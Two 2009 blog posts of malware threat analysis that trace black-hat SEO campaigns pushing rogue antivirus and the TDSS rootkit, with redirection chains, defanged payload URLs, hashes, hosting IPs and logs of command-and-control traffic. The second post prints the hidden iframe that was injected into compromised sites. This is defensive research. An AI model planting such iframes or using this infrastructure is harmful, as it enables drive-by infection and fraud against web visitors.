Malware Web Threats - Malware web based threats: Anatomy of a web hack.
Mass compromise of legitimate websites - Blackhat SEO Rogue Antivirus software and zero-day exploits!

Black Hat SEO and Rogue Antivirus p.9 (2009-04-24)<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="498" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="498" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more<br /><br /></p><table width="483" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="483"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> After Trend Micro researchers claimed that Easter related sites were used to<br />redirect visitors to rogue antivirus websites, PandaLabs recently uncovered <br />similar Black hat SEO attacks against Ford and Ned.org.<br /><br />By mis-using keywords typically related to global businesses and institutions, <br />the criminals attract unsuspecting visitors to compromised web sites. These sites <br />deceive visitors into downloading and installing a fake antivirus product that is<br />very hard to deactivate or remove. The rogue antivirus gives false alerts to the <br />user, making them think that their computer is infected. Scared users are then <br />susceptible to buying the "antivirus protection" via a page that looks like a <br />secure SSL web site. 
In fact, their money and confidential credit card information <br />are stolen by the criminals the moment they enter their personal information<br />into the payment page. <br /><br />Many global companies, including Ford, have been exploited in this way. Over a <br />million compromised web sites used Ford-based keywords to attract visitors to <br />fake antivirus sites via search engines such as Google (<a href="http://www.brafton.com/industry-news/black-hat-seo-may-force-google-change-algorithm-$1289367.htm" target="_blank">Black hat SEO may force<br />Google to change algorithm</a>). Other examples of this attack include the mis-use<br />of Easter related keywords to attract unsuspecting visitors during the Easter <br />season (<u>Trend Micro Malware Blog</u> - <a href="http://blog.trendmicro.com/rotten-eggs-an-easter-malware-campaign/">Rotten Eggs: An Easter Malware Campaign</a>).<p>There are other variants of this type of attack originating from the same <br />Ukraine / Russian based criminal fraternity. For example, the criminals use technical <br />exploits to compromise web sites, blogs, forums and the like. 
Wordpress blog <br />management software has been a victim of such an exploit, allowing the criminals<br />to inject malicious code directly into all pages. A visitor to one of these infected<br />sites will be redirected to another site where rogue antivirus software is again <br />downloaded (<u>PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/New-Blackhat-SEO-attack-exploits-vulnerabilities-in-Wordpress-to-distribute-rogue-antivirus-software.aspx" target="_blank">New Blackhat SEO attack exploits vulnerabilities in <br />Wordpress to distribute rogue antivirus software</a>).<p>The criminals put a lot of effort into ensuring the longevity of their scam.<br />Frequent IP changes and moving from location to location help ensure that <br /> they can continue their activities.<p>You can get more information about all these attacks from the following <br />resources. The PandaLabs video gives a particularly clear and concise overview.<p> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4143942&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object><p>The following links provide more information about this attack:<br /> <br /> <u>The Tech Herald</u>: <a href="http://www.thetechherald.com/article.php/200916/3450/Malicious-SEO-targets-Ford-Motor-Company" target="_blank">Malicious SEO targets Ford Motor Company</a><br /> <u>PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Targeted-Blackhat-SEO-Attack-against-Ford-Motor-Co_2E00_.aspx" target="_blank">Targeted Blackhat SEO Attack against Ford Motor 
Co.</a><br /> <br /> Read the article on WebProNews: <a href="http://www.webpronews.com/topnews/2009/04/20/google-set-to-change-ranking-algorithm" target="_blank">Blackhat SEO spammers force Google’s hand</a><br /><hr /><p> <u>Related attack:<br /> <br /> PandaLabs</u>: <a href="http://pandalabs.pandasecurity.com/archive/Blackhat-SEO-Fueled-Rogue-Security-Campaign.aspx" target="_blank">Blackhat SEO Fueled Rogue Security Campaign</a><br /> <a href="http://support.us.pandasecurity.com/blog/list.txt" target="_blank">Sample hijacked search terms</a> (text file) <br /> <br /> The website implicated is: <span class="scam_website">getscanonline.com</span> (also hosted on 209.44.126.14).<br /> <br /> <u>Softpedia</u>: <a href="http://news.softpedia.com/news/Easter-and-Ford-Search-Results-Poisoned-109376.shtml" target="_blank">Easter and Ford Search Results Poisoned</a> <br /> <br />In this case, the files found on the site are detected by Trend Micro as <br /><a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.BAF&VSect=T" target="_blank"><br />TROJ_FAKEAV.BAF</a> - <a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS_DLOADER.WKQ&VSect=T" target="_top">JS_DLOADER.WKQ</a><br /><br />The websites in question are: <span class="scam_website">trustsecurityshield.com</span> and <span class="scam_website">topsecurity4you.com</span><br />which both have served for only two or three days (hosted on 209.44.126.14).<br /> </p>
<hr />
<br />
Technical details can be found below<br /> <br /><br /> <u>Vulnerabilities in Wordpress exploited to distribute rogue antivirus software</u><br /> <br /> Watch the full video: <br /> <object width="400" height="300"> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /> <param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /> <embed src="http://vimeo.com/moogaloop.swf?clip_id=4288832&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed> </object> <br /> <br /> I would draw your attention to the video above. <br /> <br /> This is a screenshot at 03:11.<br /> <br /> If you zoom into it you will see the domain <span class="scam_website">"load-archive-av-pro.com"</span>. <br /> The domain is still active and shared with many other fake scanner websites<br />like <span class="scam_website">"antivir-scan-pro-best.com"</span> as the location of the payload. 
<br /><a href="http://wepawet.iseclab.org/view.php?hash=0224dbcb7d367c49e1740e20445a744e&t=1240592593&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5FLsRkSW1Hl180hoAe88ZdvNncSVWYwAy8MzMyy-V3vQyIUSJ5rFB0gAZi-oemYrKNyPqJBqa1x7sLdjadNDUlg_A_h0BuVyERrqxPm-wcAs4zHA5fvPS47bG4ofWgXuNy3ZFZwHKkCc/s1600-h/malicious-website.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5FLsRkSW1Hl180hoAe88ZdvNncSVWYwAy8MzMyy-V3vQyIUSJ5rFB0gAZi-oemYrKNyPqJBqa1x7sLdjadNDUlg_A_h0BuVyERrqxPm-wcAs4zHA5fvPS47bG4ofWgXuNy3ZFZwHKkCc/s320/malicious-website.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328297419882455090" /></a><br /> <br /> <br /> The process:<br /> <br /> I will take some words found on Ned.org as an example.<br /> <br /> <br /> The Google cache: <br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwtBaxqHr2V1hfYrJ29dZouYbsCoiNOUmV4_5PFiqIKXb9bBycD6G1qT0o6oLEc8QAeoLbZm82BxknnzIu3zaimlPbV0oCerTYPIW4il3bcPy_zUJlrdHapZ5zrfl_JwoL0lF9pyF4zFGk/s1600-h/Ned.org-Malware_Campaign.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 138px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwtBaxqHr2V1hfYrJ29dZouYbsCoiNOUmV4_5PFiqIKXb9bBycD6G1qT0o6oLEc8QAeoLbZm82BxknnzIu3zaimlPbV0oCerTYPIW4il3bcPy_zUJlrdHapZ5zrfl_JwoL0lF9pyF4zFGk/s320/Ned.org-Malware_Campaign.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328291836656013730" /></a> <br /> <br /> The poisoned keywords: <br /> <br /> "Kettle Vally Line Song"<br /> <br /> <br /> The Google search:<br /> <br /> <a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-roI8WU0Q8iaO41s_pDMhOEvrHM63-Vl-jrZHJIzyvFPjS8nZI3p7RIFTk6MHRUeKl0W2PUNOhTM4pFJxL6bXglZGwsQegsxpZPvrkbWLv93iBbwrqwuSrogCxNICxM8iprwACHWmwot/s1600-h/KettleVallyLineSong.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-roI8WU0Q8iaO41s_pDMhOEvrHM63-Vl-jrZHJIzyvFPjS8nZI3p7RIFTk6MHRUeKl0W2PUNOhTM4pFJxL6bXglZGwsQegsxpZPvrkbWLv93iBbwrqwuSrogCxNICxM8iprwACHWmwot/s320/KettleVallyLineSong.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328291834495333730" /></a> <br /> <br /> The redirection analysis:<br /> <br /> <span class="scam_website">hxxp://cropperddi.fortunecity.com/6766.html</span> <br /> <span class="scam_website">hxxp://sandbergjbo.fortunecity.com/26894.html</span> <br /> <br /> <a href="http://wepawet.iseclab.org/view.php?hash=fa5c5fea775ed795a7f6bdd131ec5c86&t=1240589203&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system<br /> <a href="http://wepawet.iseclab.org/view.php?hash=e47a21c33d6df03738d0dbcfdba418f8&t=1240589619&type=js" target="_blank">Analysis</a> -> redirect to a traffic management system <br /> <br /> <span class="scam_website">hxxp://redirxl.com/filt/in.cgi?5&group=5q</span> <br /> <br /> which then redirects to the malicious site<br /> <br /> <span class="scam_website">hxxp://antivir-scan-pro-best.com/11038/3/</span> <br /> <br /> The payload is located on the same site that appears in the <br />
PandaLabs article
which is:<br />
<br /> <span class="scam_website">hxxp://files.load-archive-av-pro.com/normal/<br />
setup_11038_3_1.exe</span> <br />
<br /> File size: 104971 bytes <br /> MD5...: 2a9889219ec9d0124892e5e64eaed2bd<br /> <br /> <a href="http://www.virustotal.com/analisis/4e66a86232471aefaa52aa7b4d886ddf" target="_blank">VirusTotal </a><br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1151c650ee74a1834913f5939e6f02f4d" target="_blank">Anubis</a><br /> <br /> ---------------------------<br /> <br /> 64.69.32.220<br /> <br /> <span class="scam_website">antivir-scan-pro-best.com</span> <br /> <br /> <p>Registrant: Lee Brinkman (leebrinkm@gmail.com)<br /> 4396 Ross Street<br /> Mount Vernon<br /> Illinois,62864<br /> US<br /> Tel. +001.65746675653</p> <p>Creation Date: 17-Apr-2009 <br /> Expiration Date: 17-Apr-2010</p> <p>Domain servers in listed order:<br /> <span class="scam_website">ns2.antivir-scan-pro-best.com<br /> ns1.antivir-scan-pro-best.com</span><br /><br /> Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT. LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /> Also on this IP - previously used<br /><br /><span class="scam_website">checker-pc-pro-av.com</span><br /><span class="scam_website">sheck-pro-as.com</span><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeprM4j7MQQEzaB-zuy3SSxsVw87FRJgYk8ehyphenhyphencLBNOg9KFyzYbytRsw1cG9sSqQTkExeE5Jbd4nX4wDnIg6sUS4x71w5ICyEkLN2cGldoQo_oCHbkYdLklXtOHqE_Gm7jpPv-AvE31p9/s1600-h/64.69.32.220.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 79px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqeprM4j7MQQEzaB-zuy3SSxsVw87FRJgYk8ehyphenhyphencLBNOg9KFyzYbytRsw1cG9sSqQTkExeE5Jbd4nX4wDnIg6sUS4x71w5ICyEkLN2cGldoQo_oCHbkYdLklXtOHqE_Gm7jpPv-AvE31p9/s320/64.69.32.220.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328309552673363570" /></a> <br /> </p>---------------------------<br /><br />195.88.80.127 - ECOWEB AS35695 - ecoweb.lv <br /><br /><span class="scam_website">load-archive-av-pro.com</span> <br /><span class="scam_website">files.load-archive-av-pro.com</span> <br /><br /><p>Registrant: Mary Smalls (mary.sma0@gmail.com)<br />2251 Doctors Drive<br />Los Angeles<br />California, 90066<br />US<br />Tel. +001.86758776498</p><p>Creation Date: 17-Apr-2009 <br />Expiration Date: 17-Apr-2010</p><p>Domain servers in listed order:<br /><span class="scam_website"> ns2.load-archive-av-pro.com<br /> ns1.load-archive-av-pro.com</span></p>Registrar: <br /> DIRECTI INTERNET SOLUTIONS PVT.
LTD. <br />
D/B/A PUBLICDOMAINREGISTRY.COM<br /><br />Also on this IP - previously used<br /><br /><span class="scam_website">download-pro-as.net<br />load-antivir-pro-pc.com<br />files.load-antivir-pro-pc.com <br /></span> <br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8KsrABAO_HDk84nrwKDwGvsgUJyPw0JOvq_jUQg85sughABW3ukhOpVdN2IpJ50n8nT2dGVCrJughLbs9xWJyq893VRhPiq6sqIJuzupZS-x-qGwSPcX51hRlSuAtm5bmjpKutZlh687V/s1600-h/195.88.80.127.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 77px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8KsrABAO_HDk84nrwKDwGvsgUJyPw0JOvq_jUQg85sughABW3ukhOpVdN2IpJ50n8nT2dGVCrJughLbs9xWJyq893VRhPiq6sqIJuzupZS-x-qGwSPcX51hRlSuAtm5bmjpKutZlh687V/s320/195.88.80.127.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328310440830247970" /></a> <br /><br />
<hr />
<br /><p>From the article on PandaLabs' blog about the SEO attack against <br />
Ford Motor Co.
you can see the domain "globextubes.com" <br />
previously hosted on 64.69.32.203. <br />
<br />This is a graph (from Robtex) of some of these sites serving in <br />
the same campaign:<br /><br /><span class="scam_website">fasttube2009.com<br /> globalstube2009.com <br /> globextubes.com <br /> streamingtubes2009.com<br /> </span> <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYLLgcRKeoU9S7y3I9b9A-0NZ_H6JgBJO2ti8P4zeRdguVMbkpVA6DiPIJA5cEL5FVGn0HG_UM1uf0hO6ppOHjLXT9s2ggRg0HoW_FuncXSAYXw5JSBoTgL9ZK7t2TplqX_5iOaTxl2Wb/s1600-h/globextubes-com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYLLgcRKeoU9S7y3I9b9A-0NZ_H6JgBJO2ti8P4zeRdguVMbkpVA6DiPIJA5cEL5FVGn0HG_UM1uf0hO6ppOHjLXT9s2ggRg0HoW_FuncXSAYXw5JSBoTgL9ZK7t2TplqX_5iOaTxl2Wb/s320/globextubes-com.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5328277591200267474" /></a> <br /><br />This is a file found on one of these sites: softwarefortubeview.40011.exe<br /><br /><a href="http://www.virustotal.com/analisis/b9ea2d9d4de565169edefc76ba5a4f41" target="_blank">VirusTotal Report</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=108520c93bee5c77409bc8b7bdc146008" target="_blank">Anubis Report</a><br /><br /><br /><br />Complete analysis below:<br /><br />After running, it connects to this URL to receive additional payloads to inject.<br /><br /><span class="scam_website">nhgfngfdhngf.com</span> - 216.240.148.9 <br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=103021a16beecf19b5b45f4d238d8173" target="_blank">ThreatExpert Report</a><br /><br /><span class="scam_website">hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8<br />cd98f00b204e9800998ecf8427e&os=512<br /><br />hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d<br />8cd98f00b204e9800998ecf8427e&os=512 <br /></span> 
<span class="scam_website"><br />(216.240.148.9)</span><br /><br />The page shows these URLs (file info and VirusTotal report added) <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://images2009best.com/perce/<br />30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230<br />740e19c810803919c83e9c9f487472375ee/70e/perce.jpg <br /></span> <br /><a href="http://www.virustotal.com/analisis/40a7052911f921606d09c46ceb188576" target="_blank">VirusTotal</a> - 4/40 (10%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=15e23cab221b44bd43dc9a97270ea4f7d&format=html" target="_blank">Anubis Report</a><br />File size: 94212 bytes <br />MD5...: e49048a38d0757b92a34dff6fc3b3f74 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="6">
216.240.157.91 [imagesrepository.com]
Request: POST /resolution.php
88.214.205.8 [zone-searching.com]
Request: POST /borders.php </textarea><br /><p>---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://venerapictures.com/item/6000dc4d413ac4f08d<br /> c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0<br /> c4f78441277ced/b0b/item.gif <br /> </span> <br /><a href="http://www.virustotal.com/analisis/c643225fd027afeabff3baec75f21e8e" target="_blank">VirusTotal</a> - 7/40 (17.5%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e3ed412e325a0ff4c963af2a626838df" target="_blank">Anubis Report</a><br />File size: 145412 bytes<br />MD5...: d2b451fee4f7c42b06121cf03f8ea281<br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://venerapictures.com/werber/900/216.jpg</span><br /><br /><a href="http://www.virustotal.com/analisis/2f9385b2d31e24fbd2b8337303a02f8f" target="_blank">VirusTotal</a> - 8/40 (20%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=17ce261f3dabfa6a4a9e179c280a453e7" target="_blank">Anubis Report</a><br />File size: 99332 bytes <br />MD5...: 5bc8a73f3412c574909e5f3c193fed89 <br /><br />---------------------------------------------------- <br /><span class="scam_website">hxxp://files.get-fails-load-av.com/exe/setup_200002.exe</span><br /><br /><a href="http://www.virustotal.com/analisis/1d973e01b69d2df97f03c7ca1e27e686" target="_blank">VirusTotal</a> - <span id="porcentaje">9/40 (22.5%)</span><br /><a href="http://anubis.iseclab.org/?action=result&task_id=104332b7aecf7fc942900f07c2e72a297" target="_blank">Anubis Report</a><br />File size: 78347 bytes<br />MD5...: ff220534519a1a116dbc2dd712bff24a <br /><br />HTTP Activity: <br /><br /><textarea name="textarea" cols="45" rows="4">
195.88.81.116 [dl.scan-anti-spy-4free.com]
195.88.80.207 [int.reporting32.com]
</textarea><br />
---------------------------------------------------- <br /><br /><span class="scam_website">hxxp://lwl-softwares.com/939.exe </span><br /><br /><a href="http://www.virustotal.com/analisis/134aceb45f081d0de75823c042925bd6" target="_blank">VirusTotal</a> - 0/39 (0%)<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1ef8a5604aabc7dc49d6fa8cba2f96ae8" target="_blank">Anubis Report</a><br />File size: 180224 bytes <br />MD5...: 1ff562c02c68f0a8001135dc89b4eaa1 <br /><br />HTTP Activity: <br /><br /><textarea name="textarea2" cols="45" rows="16">
78.47.186.162 [hitmidpoint.com]
Request: GET /?accs=939&
tid=100
84.243.252.87 [staritquick.com]
Request: GET /in.cgi?9&
gai=cspsa3p&gli=273&
gff=cs_221227254&al=
89.248.168.46 [toppromooffer.com]
Request: GET /srm/adv/142/?a=
cspsa3p&l=273&f=
cs_221227254&ex=&
ed=&sub=csp&prodabbr=USRM </textarea><br /><br />----------------------------------------------------<br /><br /><span class="scam_website">hxxp://lwl-softwares.com/important.exe</span><br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=176525f12bcb68e0495d6997859873e21" target="_blank">Anubis Report</a><br />File size: 135168 bytes<br />MD5...: 83b4560333601224cb0d5709bdf57191 <br /><br />Trojan.Win32.Tibs<br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div>

Black Hat SEO and Rogue Antivirus p.8 (2009-04-20)<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br /> Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> A quick move to the IP block 209.44.126.0/24 of "Netelligent Hosting Services Inc", which hosts several fake AV websites as well as exploits that spread the trojan TDSS/Alureon.<br /><br />All of these were found by following iframes injected on legitimate websites, poisoned keywords in Google search results and links on an ad network (screenshot below).<br /><br /><hr />Check it out - <em>maybe someone have access to your PC right now</em>! Protect yourself.<br /><br />Google also shows <a href="http://www.google.com/search?q=%22maybe+someone+have+access+to+your+PC+right+now!%22" target="_blank">14,800 results</a> for this phrase.<br /><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 69px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAp8fd0MmPMSAzVw6jB6XE3GoiLYkSUfAuf_xxYTMiZkWEDn-cX8Qh4dmLiho0MNiPNF6O42BUoNmmSC4DMs3YYIarxnPNQ_De64g9o4uA2fmxkyTkXQE_PDCkFET3he1prfPRtwDjvkC0/s320/basevirusscan.com-fake-ad.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5326619458784152914" /> <br /><br />Detection:<br /><br />Trojan TDSS<br />Trojan DNSChanger<br />Trojan Kryptik<br />Trojan FakeSpyGuard<br />Trojan InternetAntivirusPro<br /><br />Sites serving for the fake antivirus campaign:<br /><br /><b>209.44.126.14</b><br />(list of fake AV domains on this IP omitted)<p><b>209.44.126.16</b><br />systemsecurityonline.com<br />systemsecuritytool.com<br /></p><p><b>209.44.126.29</b><br />individualpeople.biz (will be analyzed below)<br /><br /><b>209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23</b><br /><br />Name servers for the rogue fake AV websites <br /><br /><b>209.44.126.32</b><br />asmmnation.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=3857827a43ea245009dd7d4bcd89f931" target="_blank">ThreatExpert report</a><br />In conjunction with an IP in Ukraine: <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2009-041208-1533-99&tabid=2" target="_blank">Symantec write up</a><br /></p><hr /><p><br />On this IP <b>209.44.126.29</b> we also have a couple of pages with exploits which lead to the trojan TDSS (Alureon).<br /><br />I will take the domain "individualpeople[.]biz" as an example.<br /></p> Malicious script (IFRAME) inserted. 
<a href="http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240077587&type=js" target="_blank">Redirection Analysis</a><br /><br /><table width="383" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="379" height="61" style="padding:15px"><iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></td></tr></table> <p><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank"></a>Redirects to the page below which host several exploits. <a href="http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js" target="_blank">Javascript Analysis</a> (Wepawet)<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://individualpeople.biz/go.php?sid=6</td></tr></table> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank">Anubis Report</a><br /><br /><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr> <td width="368" height="61" style="padding:15px">hxxp://209.44.126.30/unsecurity/pdf.php</td> </tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=929b20cc7a4033457630858487bbfc7e&t=1240078681">Wepawet Analysis</a> - <a href="http://www.virustotal.com/analisis/763688a5e2cd02d43d6de933354f63be" target="_blank">VirusTotal</a><br /><br />to finally load this page <br /><br /><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">hxxp://209.44.126.30/unsecurity/load.php</td></tr></table><br /><a href="http://www.virustotal.com/analisis/4ea0b7a64405a26f6c50f91fb6792c17" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1aab3383fb44f06d419479c2396b7b47f" target="_blank">Anubis</a><br /><br />Detections:<br 
/><br />W32/Alureon.B!Generic<br />Win32.Rootkit.TDSS.eyj.4<br />Packed.Win32.Tdss.f<br />Trojan.Win32.FakeSpyguard<br />Trojan:Win32/Alureon.gen!J<br />Trojan/Fakealert.gen <br /><br />--------------------------------------<br /><br />HTTP activity after infection<br /><br />92.48.91.145:80 - [trafficstatic.net] <br /><br />Request: GET /banner/crcmds/main <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/init <br />Response: 200 "OK" <br />Request: GET /banner/uacsrcr.dat <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/update <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacd <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacc <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uaclog <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacmask <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacserf <br />Response: 200 "OK" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/types/standart <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/affids/11 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/builds/bbr <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacbbr <br />Response: 200 "OK" <br /><br />72.233.114.126:80 - [statsanalist.cn] <br /><br />Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 <br />Response: 200 "OK" <br />Request: GET 
/?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 <br />Response: 200 "OK" <br /><br /><hr /> IPs implicated:<br /><br />209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23<br />209.44.126.29<br />209.44.126.32 <br /><br />Other domains used in conjunction can be found using ThreatExpert:<br /><br /><a href="http://www.threatexpert.com/reports.aspx?find=banner%2Fcrcmds%2Fmain" target="_blank">/banner/crcmds/main</a><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=aa0358f54817c3f8c143ade90f228c5b" target="_blank">Report 1</a><br /><a href="http://www.threatexpert.com/report.aspx?md5=1d3b847cc5a235142acd32d1deba6aff" target="_blank">Report 2</a><br /><br /><p>92.48.91.144<br />trafficstatic.com<br />explorerex.com<br />windowslogonex.com</p><p>92.48.91.145<br />trafficstatic.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4" target="_blank">ThreatExpert Report</a></p><p>95.211.14.159<br />golddiggero1.com</p><p>76.76.103.162<br />webieupdate.net</p><p>94.76.208.32<br />symupdate2.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>72.233.114.125<br />webnicrisoft.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>64.213.140.254<br />webmsupdate.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div>
